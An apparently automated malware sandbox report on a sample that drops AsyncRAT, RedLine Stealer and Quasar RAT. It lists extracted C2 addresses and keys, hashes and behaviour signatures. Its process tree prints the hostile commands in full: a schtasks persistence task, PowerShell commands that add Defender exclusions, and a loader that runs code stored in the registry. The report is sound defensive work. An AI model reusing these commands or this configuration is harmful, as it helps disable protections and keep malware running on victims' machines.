Analysis

max time kernel: 151s
max time network: 150s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 01/11/2022, 10:41

Static task: static1
Behavioral task: behavioral1
Sample: BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Resource: win7-20220812-en

General

Target: BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
Size: 584KB
MD5: 8553f9793539d4d17c13e464d606d7dc
SHA1: a033d05b0c0a5b220fde15827b5c716fbec3b398
SHA256: bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
SHA512: 2d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec
SSDEEP: 6144:LHns2eIXWxewKi/i/iHBW0LM7Sx2R1i0t03ugcHg4TU48YMizi:LH4x4KKABW0g2x6/t2S/UfYM4
Malware Config

Extracted: asyncrat
- Ratatouille 0.1.0
- Youtube
- 179.43.187.19:33
- 179.43.187.19:2525
- 179.43.187.19:4523
- 179.43.187.19:5555
- sdhgamkfgae4-youtube
- delay: 3
- install: true
- install_file: $77-update.exe
- install_folder: %AppData%

Extracted: redline
- cheat
- 179.43.187.19:18875

Extracted: quasar
- 1.4.0
- r77Version
- 179.43.187.19:2326
- d6db683c-9b85-4417-b1a3-4ff8bec1d98b
- encryption_key: 83FE26AAD844F101036726AFCD7F28CF377D20AF
- install_name: $77Client.exe
- log_directory: Logs
- reconnect_delay: 3000
- startup_key: $77Client
- subdirectory: $77win
Signatures

Quasar payload (3 IoCs)
resource | yara_rule
- behavioral1/files/0x000c0000000122ec-321.dat | family_quasar
- behavioral1/files/0x000c0000000122ec-323.dat | family_quasar
- behavioral1/files/0x000c0000000122ec-320.dat | family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine payload (4 IoCs)
resource | yara_rule
- behavioral1/files/0x000c0000000122e0-264.dat | family_redline
- behavioral1/files/0x000c0000000122e0-267.dat | family_redline
- behavioral1/files/0x000c0000000122e0-265.dat | family_redline
- behavioral1/memory/972-274-0x0000000000180000-0x000000000019E000-memory.dmp | family_redline

Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
description | pid | Process | procid_target
- PID 1108 created 416 | 1108 | powershell.EXE | 3
- PID 1976 created 416 | 1976 | powershell.EXE | 3

Async RAT payload (10 IoCs)
resource | yara_rule
- behavioral1/memory/1920-62-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
- behavioral1/memory/1920-63-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
- behavioral1/memory/1920-64-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
- behavioral1/memory/1920-65-0x000000000040D15E-mapping.dmp | asyncrat
- behavioral1/memory/1920-67-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
- behavioral1/memory/1920-69-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
- behavioral1/memory/1536-90-0x000000000040D15E-mapping.dmp | asyncrat
- behavioral1/memory/1536-95-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
- behavioral1/memory/1536-93-0x0000000000400000-0x0000000000412000-memory.dmp | asyncrat
- behavioral1/memory/1536-106-0x00000000005C0000-0x00000000005CC000-memory.dmp | asyncrat

Looks for VirtualBox Guest Additions in registry (2 TTPs, 2 IoCs)
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions | $77-update.exe
- Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe

Executes dropped EXE (6 IoCs)
pid | Process
- 1564 | $77-update.exe
- 1536 | $77-update.exe
- 1636 | pnzqhe.exe
- 972 | aztndq.exe
- 608 | jryyjp.exe
- 820 | adiojv.exe

Looks for VMWare Tools registry key (2 TTPs, 2 IoCs)
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools | $77-update.exe

Checks BIOS information in registry (2 TTPs, 4 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | $77-update.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | $77-update.exe

Drops startup file (2 IoCs)
description | ioc | Process
- File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Clip.exe | jryyjp.exe
- File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Clip.exe | jryyjp.exe

Loads dropped DLL (6 IoCs)
pid | Process
- 968 | cmd.exe
- 1564 | $77-update.exe
- 948 | powershell.exe
- 784 | powershell.exe
- 896 | powershell.exe
- 1540 | powershell.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Maps connected drives based on registry (3 TTPs, 4 IoCs)
Disk information is often read in order to detect sandboxing environments.
description | ioc | Process
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | $77-update.exe
- Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | $77-update.exe

Drops file in System32 directory (2 IoCs)
description | ioc | Process
- File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
- File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE

Suspicious use of SetThreadContext (4 IoCs)
description | pid | Process | procid_target
- PID 1488 set thread context of 1920 | 1488 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 28
- PID 1564 set thread context of 1536 | 1564 | $77-update.exe | 36
- PID 1976 set thread context of 680 | 1976 | powershell.EXE | 50
- PID 1108 set thread context of 588 | 1108 | powershell.EXE | 51

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
- 1380 | schtasks.exe

Delays execution with timeout.exe (1 IoCs)
pid | Process
- 1668 | timeout.exe

Modifies data under HKEY_USERS (2 IoCs)
description | ioc | Process
- Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.EXE
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b00bc812e7edd801 | powershell.EXE

Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process (consecutive identical rows are collapsed with a count)
- 1920 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- 540 | powershell.exe
- 1608 | powershell.exe
- 948 | powershell.exe (x3)
- 1536 | $77-update.exe
- 1108 | powershell.EXE
- 1976 | powershell.EXE
- 1108 | powershell.EXE
- 1976 | powershell.EXE
- 680 | dllhost.exe (x4)
- 784 | powershell.exe
- 896 | powershell.exe
- 680 | dllhost.exe (x2)
- 784 | powershell.exe (x2)
- 896 | powershell.exe (x2)
- 1536 | $77-update.exe (x2)
- 680 | dllhost.exe (x30)
- 1540 | powershell.exe
- 680 | dllhost.exe (x2)
- 1540 | powershell.exe (x2)
- 1536 | $77-update.exe
- 680 | dllhost.exe (x2)
- 972 | aztndq.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process (consecutive identical rows are collapsed with a count)
- Token: SeDebugPrivilege | 1920 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe
- Token: SeDebugPrivilege | 1536 | $77-update.exe (x2)
- Token: SeDebugPrivilege | 540 | powershell.exe
- Token: SeDebugPrivilege | 1608 | powershell.exe
- Token: SeDebugPrivilege | 948 | powershell.exe
- Token: SeDebugPrivilege | 1108 | powershell.EXE
- Token: SeDebugPrivilege | 1976 | powershell.EXE
- Token: SeDebugPrivilege | 1108 | powershell.EXE
- Token: SeDebugPrivilege | 1976 | powershell.EXE
- Token: SeDebugPrivilege | 680 | dllhost.exe
- Token: SeAuditPrivilege | 868 | svchost.exe (x2)
- Token: SeDebugPrivilege | 784 | powershell.exe
- Token: SeDebugPrivilege | 896 | powershell.exe
- Token: SeShutdownPrivilege | 1352 | Explorer.EXE (x2)
- Token: SeDebugPrivilege | 972 | aztndq.exe
- Token: SeAuditPrivilege | 868 | svchost.exe
- Token: SeDebugPrivilege | 1540 | powershell.exe
- Token: SeDebugPrivilege | 820 | adiojv.exe
- Token: SeAssignPrimaryTokenPrivilege | 868 | svchost.exe
- Token: SeIncreaseQuotaPrivilege | 868 | svchost.exe
- Token: SeSecurityPrivilege | 868 | svchost.exe
- Token: SeTakeOwnershipPrivilege | 868 | svchost.exe
- Token: SeLoadDriverPrivilege | 868 | svchost.exe
- Token: SeSystemtimePrivilege | 868 | svchost.exe
- Token: SeBackupPrivilege | 868 | svchost.exe
- Token: SeRestorePrivilege | 868 | svchost.exe
- Token: SeShutdownPrivilege | 868 | svchost.exe
- Token: SeSystemEnvironmentPrivilege | 868 | svchost.exe
- Token: SeUndockPrivilege | 868 | svchost.exe
- Token: SeManageVolumePrivilege | 868 | svchost.exe
- Token: SeAssignPrimaryTokenPrivilege | 868 | svchost.exe
- Token: SeIncreaseQuotaPrivilege | 868 | svchost.exe
- Token: SeSecurityPrivilege | 868 | svchost.exe
- Token: SeTakeOwnershipPrivilege | 868 | svchost.exe
- Token: SeLoadDriverPrivilege | 868 | svchost.exe
- Token: SeSystemtimePrivilege | 868 | svchost.exe
- Token: SeBackupPrivilege | 868 | svchost.exe
- Token: SeRestorePrivilege | 868 | svchost.exe
- Token: SeShutdownPrivilege | 868 | svchost.exe
- Token: SeSystemEnvironmentPrivilege | 868 | svchost.exe
- Token: SeUndockPrivilege | 868 | svchost.exe
- Token: SeManageVolumePrivilege | 868 | svchost.exe
- Token: SeAssignPrimaryTokenPrivilege | 868 | svchost.exe
- Token: SeIncreaseQuotaPrivilege | 868 | svchost.exe
- Token: SeSecurityPrivilege | 868 | svchost.exe
- Token: SeTakeOwnershipPrivilege | 868 | svchost.exe
- Token: SeLoadDriverPrivilege | 868 | svchost.exe
- Token: SeSystemtimePrivilege | 868 | svchost.exe
- Token: SeBackupPrivilege | 868 | svchost.exe
- Token: SeRestorePrivilege | 868 | svchost.exe
- Token: SeShutdownPrivilege | 868 | svchost.exe
- Token: SeSystemEnvironmentPrivilege | 868 | svchost.exe
- Token: SeUndockPrivilege | 868 | svchost.exe
- Token: SeManageVolumePrivilege | 868 | svchost.exe
- Token: SeAssignPrimaryTokenPrivilege | 868 | svchost.exe
- Token: SeIncreaseQuotaPrivilege | 868 | svchost.exe
- Token: SeSecurityPrivilege | 868 | svchost.exe
- Token: SeTakeOwnershipPrivilege | 868 | svchost.exe
- Token: SeLoadDriverPrivilege | 868 | svchost.exe
- Token: SeSystemtimePrivilege | 868 | svchost.exe
- Token: SeBackupPrivilege | 868 | svchost.exe

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target (consecutive identical rows are collapsed with a count)
- PID 1488 wrote to memory of 1920 | 1488 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 28 (x9)
- PID 1920 wrote to memory of 1628 | 1920 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 29 (x4)
- PID 1920 wrote to memory of 968 | 1920 | BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe | 31 (x4)
- PID 1628 wrote to memory of 1380 | 1628 | cmd.exe | 33 (x4)
- PID 968 wrote to memory of 1668 | 968 | cmd.exe | 34 (x4)
- PID 968 wrote to memory of 1564 | 968 | cmd.exe | 35 (x7)
- PID 1564 wrote to memory of 1536 | 1564 | $77-update.exe | 36 (x12)
- PID 1536 wrote to memory of 540 | 1536 | $77-update.exe | 37 (x4)
- PID 1536 wrote to memory of 1608 | 1536 | $77-update.exe | 39 (x4)
- PID 1536 wrote to memory of 704 | 1536 | $77-update.exe | 41 (x4)
- PID 704 wrote to memory of 948 | 704 | cmd.exe | 43 (x4)
- PID 948 wrote to memory of 1636 | 948 | powershell.exe | 44 (x4)
Processes

Process tree (indentation shows parent/child nesting; each entry gives the image path, the command line, the signatures triggered by that process, and its PID):

- C:\Windows\system32\lsass.exe (PID 476)
  cmd: C:\Windows\system32\lsass.exe

- C:\Windows\system32\services.exe (PID 460)
  cmd: C:\Windows\system32\services.exe

    - C:\Windows\system32\svchost.exe (PID 868)
      cmd: C:\Windows\system32\svchost.exe -k netsvcs
      sig: Suspicious use of AdjustPrivilegeToken

        - \\?\C:\Windows\system32\wbem\WMIADAP.EXE (PID 2000)
          cmd: wmiadap.exe /F /T /R

        - C:\Windows\system32\taskeng.exe (PID 1604)
          cmd: taskeng.exe {B5D88114-AA30-4B8B-92A7-7D62C2E8F18E} S-1-5-18:NT AUTHORITY\System:Service:

            - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE (PID 1108)
              cmd: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
              sig: Suspicious use of NtCreateUserProcessOtherParentProcess
              sig: Drops file in System32 directory
              sig: Suspicious use of SetThreadContext
              sig: Suspicious behavior: EnumeratesProcesses
              sig: Suspicious use of AdjustPrivilegeToken

            - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 1976)
              cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
              sig: Suspicious use of NtCreateUserProcessOtherParentProcess
              sig: Drops file in System32 directory
              sig: Suspicious use of SetThreadContext
              sig: Modifies data under HKEY_USERS
              sig: Suspicious behavior: EnumeratesProcesses
              sig: Suspicious use of AdjustPrivilegeToken

    - C:\Windows\System32\spoolsv.exe (PID 272)
      cmd: C:\Windows\System32\spoolsv.exe

    - C:\Windows\system32\taskhost.exe (PID 1228)
      cmd: "taskhost.exe"

    - C:\Windows\system32\svchost.exe (PID 1816)
      cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

    - C:\Windows\system32\sppsvc.exe (PID 1128)
      cmd: C:\Windows\system32\sppsvc.exe

    - C:\Windows\system32\svchost.exe (PID 1028)
      cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

    - C:\Windows\system32\svchost.exe (PID 300)
      cmd: C:\Windows\system32\svchost.exe -k NetworkService

    - C:\Windows\system32\svchost.exe (PID 844)
      cmd: C:\Windows\system32\svchost.exe -k LocalService

    - C:\Windows\System32\svchost.exe (PID 792)
      cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

    - C:\Windows\System32\svchost.exe (PID 744)
      cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

    - C:\Windows\system32\svchost.exe (PID 656)
      cmd: C:\Windows\system32\svchost.exe -k RPCSS

    - C:\Windows\system32\svchost.exe (PID 580)
      cmd: C:\Windows\system32\svchost.exe -k DcomLaunch

        - C:\Windows\system32\wbem\wmiprvse.exe (PID 816)
          cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

- C:\Windows\system32\winlogon.exe (PID 416)
  cmd: winlogon.exe

    - C:\Windows\System32\dllhost.exe (PID 680)
      cmd: C:\Windows\System32\dllhost.exe /Processid:{a6b6aeb0-d464-4ea5-b2ac-d509709e490e}
      sig: Suspicious behavior: EnumeratesProcesses
      sig: Suspicious use of AdjustPrivilegeToken

    - C:\Windows\SysWOW64\dllhost.exe (PID 588)
      cmd: C:\Windows\SysWOW64\dllhost.exe /Processid:{16e1b028-0440-415f-b06f-43c00916467e}

- C:\Windows\system32\lsm.exe (PID 484)
  cmd: C:\Windows\system32\lsm.exe

- C:\Windows\system32\Dwm.exe (PID 1316)
  cmd: "C:\Windows\system32\Dwm.exe"

- C:\Windows\Explorer.EXE (PID 1352)
  cmd: C:\Windows\Explorer.EXE
  sig: Suspicious use of AdjustPrivilegeToken

    - C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe (PID 1488)
      cmd: "C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"
      sig: Looks for VirtualBox Guest Additions in registry
      sig: Looks for VMWare Tools registry key
      sig: Checks BIOS information in registry
      sig: Maps connected drives based on registry
      sig: Suspicious use of SetThreadContext
      sig: Suspicious use of WriteProcessMemory

        - C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe (PID 1920)
          cmd: "{path}"
          sig: Suspicious behavior: EnumeratesProcesses
          sig: Suspicious use of AdjustPrivilegeToken
          sig: Suspicious use of WriteProcessMemory

            - C:\Windows\SysWOW64\cmd.exe (PID 1628)
              cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"' & exit
              sig: Suspicious use of WriteProcessMemory

                - C:\Windows\SysWOW64\schtasks.exe (PID 1380)
                  cmd: schtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"'
                  sig: Creates scheduled task(s)

            - C:\Windows\SysWOW64\cmd.exe (PID 968)
              cmd: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1A7.tmp.bat""
              sig: Loads dropped DLL
              sig: Suspicious use of WriteProcessMemory

                - C:\Windows\SysWOW64\timeout.exe (PID 1668)
                  cmd: timeout 3
                  sig: Delays execution with timeout.exe

                - C:\Users\Admin\AppData\Roaming\$77-update.exe (PID 1564)
                  cmd: "C:\Users\Admin\AppData\Roaming\$77-update.exe"
                  sig: Looks for VirtualBox Guest Additions in registry
                  sig: Executes dropped EXE
                  sig: Looks for VMWare Tools registry key
                  sig: Checks BIOS information in registry
                  sig: Loads dropped DLL
                  sig: Maps connected drives based on registry
                  sig: Suspicious use of SetThreadContext
                  sig: Suspicious use of WriteProcessMemory

                    - C:\Users\Admin\AppData\Roaming\$77-update.exe (PID 1536)
                      cmd: "{path}"
                      sig: Executes dropped EXE
                      sig: Suspicious behavior: EnumeratesProcesses
                      sig: Suspicious use of AdjustPrivilegeToken
                      sig: Suspicious use of WriteProcessMemory

                        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 540)
                          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force
                          sig: Suspicious behavior: EnumeratesProcesses
                          sig: Suspicious use of AdjustPrivilegeToken

                        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1608)
                          cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension @('exe','dll') -Force
                          sig: Suspicious behavior: EnumeratesProcesses
                          sig: Suspicious use of AdjustPrivilegeToken

                        - C:\Windows\SysWOW64\cmd.exe (PID 704)
                          cmd: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pnzqhe.exe"' & exit
                          sig: Suspicious use of WriteProcessMemory

                            - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 948)
                              cmd: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\pnzqhe.exe"'
                              sig: Loads dropped DLL
                              sig: Suspicious behavior: EnumeratesProcesses
                              sig: Suspicious use of AdjustPrivilegeToken
                              sig: Suspicious use of WriteProcessMemory

                                - C:\Users\Admin\AppData\Local\Temp\pnzqhe.exe (PID 1636)
                                  cmd: "C:\Users\Admin\AppData\Local\Temp\pnzqhe.exe"
                                  sig: Executes dropped EXE

                        - C:\Windows\SysWOW64\cmd.exe (PID 1192)
                          cmd: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jryyjp.exe"' & exit

                            - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 896)
                              cmd: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jryyjp.exe"'
                              sig: Loads dropped DLL
                              sig: Suspicious behavior: EnumeratesProcesses
                              sig: Suspicious use of AdjustPrivilegeToken

                                - C:\Users\Admin\AppData\Local\Temp\jryyjp.exe (PID 608)
                                  cmd: "C:\Users\Admin\AppData\Local\Temp\jryyjp.exe"
                                  sig: Executes dropped EXE
                                  sig: Drops startup file

                        - C:\Windows\SysWOW64\cmd.exe (PID 1648)
                          cmd: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aztndq.exe"' & exit

                            - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 784)
                              cmd: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\aztndq.exe"'
                              sig: Loads dropped DLL
                              sig: Suspicious behavior: EnumeratesProcesses
                              sig: Suspicious use of AdjustPrivilegeToken

                                - C:\Users\Admin\AppData\Local\Temp\aztndq.exe (PID 972)
                                  cmd: "C:\Users\Admin\AppData\Local\Temp\aztndq.exe"
                                  sig: Executes dropped EXE
                                  sig: Suspicious behavior: EnumeratesProcesses
                                  sig: Suspicious use of AdjustPrivilegeToken

                        - C:\Windows\SysWOW64\cmd.exe (PID 896)
                          cmd: "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\adiojv.exe"' & exit

                            - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1540)
                              cmd: powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\adiojv.exe"'
                              sig: Loads dropped DLL
                              sig: Suspicious behavior: EnumeratesProcesses
                              sig: Suspicious use of AdjustPrivilegeToken

                                - C:\Users\Admin\AppData\Local\Temp\adiojv.exe (PID 820)
                                  cmd: "C:\Users\Admin\AppData\Local\Temp\adiojv.exe"
                                  sig: Executes dropped EXE
                                  sig: Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\conhost.exe (PID 576)
  cmd: \??\C:\Windows\system32\conhost.exe "668684495-1483970502-1418786949-800884811-977448482-96501856-1772843700-170108309"

- C:\Windows\system32\conhost.exe (PID 1532)
  cmd: \??\C:\Windows\system32\conhost.exe "1139731289-13498560651055892570-1906471362-15694092201933630600290700091608861979"

- C:\Windows\system32\conhost.exe (PID 1624)
  cmd: \??\C:\Windows\system32\conhost.exe "-1507667889-268449033-1423338198-1492980253620861439-1933508774-387094207-288685600"

- C:\Windows\system32\conhost.exe (PID 1632)
  cmd: \??\C:\Windows\system32\conhost.exe "-20393064051757100730-16330321699532405612044648895250725453-2117161765-1091857355"

- C:\Windows\system32\conhost.exe (PID 1516)
  cmd: \??\C:\Windows\system32\conhost.exe "-268108441-266419577-9576016062078434459-505200725-6611749502065749379-440121918"
Network
MITRE ATT&CK Enterprise v6
Downloads

Unique dropped or downloaded files (the report listed several of these entries more than once; duplicates are collapsed here):

- Filesize: 502KB
  MD5: 254850c126b7dd70bc258b16a5fa029c
  SHA1: 993c0147f75530ae0d3c45a971abe71eb0a8a68e
  SHA256: 064abdb50b3a06bc95b60e28b37e371af3ab7fe0918e5337713d94a686d25740
  SHA512: eb2d44ee1c67c247fc184f38764c762a04266773d8669e488d78f0a777d28c26a31033d8b1ec5bc36896f4ef8098fa641210919798bd2722a5b15e2dd1bba8cf

- Filesize: 95KB
  MD5: 3cb329c9120e1ddc5717b26631760fe8
  SHA1: 54998ad15f5a3e87bbd140f67473e7d418b23c92
  SHA256: 68a30dd865b1e67cb013a5dfe856aaf1a93df96c7feed9645288e4d8876b9bc5
  SHA512: 7090b8fbd4042b5db300751ccce0eb72e628899da52efb1e4059eb36423fb5e63121bee1c5ee4367920c1c9cd4000bb28fd70774846c53e6686b7e1a3c57b970

- Filesize: 9KB
  MD5: 70aa2221d41c15462b83d86670e804ca
  SHA1: 3c711d4d294b9d3db9b71bbb6edce30c4a59f032
  SHA256: 6ed8c7a401fcab2242cd8be75c39e6b38dea1d95d3995d81ec81b6ecb46f9fe5
  SHA512: 9997fe37eafaadf72c4b884259053ab85250baabc4b9127d39d445a159c39509510d495ddaac229ee2940c76133ed9faddea8bb56cb71463df2757c379d2d5e3

- Filesize: 351KB
  MD5: e2462dff81e09c335dd89f711c7a2fba
  SHA1: 5b9badc4d85f1ce4912772507523ab062a730d4e
  SHA256: fcd60b5bd3815f1c591ada33b9a46d4126c216dc32cc7b946352a938844138bd
  SHA512: bbedc7d5c74ecd851e422aa5c89768300b4522d08ef8f361c4eb84f6830d146bc0069c070f7fdf686f01eceed4786240a55770f8fcbcdf60902bc6c60cb4243e

- Filesize: 153B
  MD5: 0e5345eda0ce8bb4ce97c72503588c94
  SHA1: 4b0fc1132398ca3e8fecb697d74eb7b8d6eea2a4
  SHA256: 05cebcff2a3e250fa13d45b613fcd8d00c91fe23451efa8faf7da8363ba1bfd4
  SHA512: 8a4f9617c7104163fad501f5766701ba4afeeae0683dc78d41beb78bf96372fb6a7a6458625c10f82e3aaf2ff2b3e841588d7d3a969fb98f91b0ee417e3a553b

- Filesize: 584KB (same hashes as the submitted sample)
  MD5: 8553f9793539d4d17c13e464d606d7dc
  SHA1: a033d05b0c0a5b220fde15827b5c716fbec3b398
  SHA256: bdd2412c4cb1952748237e6cc32bb3d39a68cb4e1ed3e00db88e74532f1c4d2a
  SHA512: 2d672c0a5dfaa1ebd9ee7dbdfec33c8c32bd3b827b03b206ad1bbcb414e2efa65fc8d284ba9c5037800f3c8d69a2a64a864562732951581244722a26401f3aec

- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 33fe37eeaf26f00718aa2d0c68581fd0
  SHA1: b1c6af86b9dd536e2674e1eec7ce2fa170faac64
  SHA256: cb399b8870a74447ff2408d09b3ed43c4f1b92db8c484e70bb6428de933c9373
  SHA512: b0f4ea83ad8cb85f3a2d75cd463b4f0e2fd6c8417de4d0d5b690af7b632156ae95bb310af8e78560f921541113567f0054a24c2a8cb6e00e7fd8138de8d20889